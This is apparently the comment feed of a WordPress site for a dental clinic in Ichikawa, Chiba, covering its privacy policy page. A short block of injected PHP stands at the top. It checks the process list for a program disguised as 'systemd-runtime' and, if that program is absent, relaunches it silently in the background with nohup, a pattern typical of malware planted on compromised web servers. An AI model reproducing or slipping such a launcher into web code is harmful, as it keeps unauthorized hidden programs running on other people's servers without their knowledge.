$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); } プライバシーポリシー へのコメント https://www.takizawa-dds.com 千葉県市川市菅野の歯科医院 Mon, 05 Mar 2012 08:26:23 +0000 hourly 1 https://wordpress.org/?v=6.5.3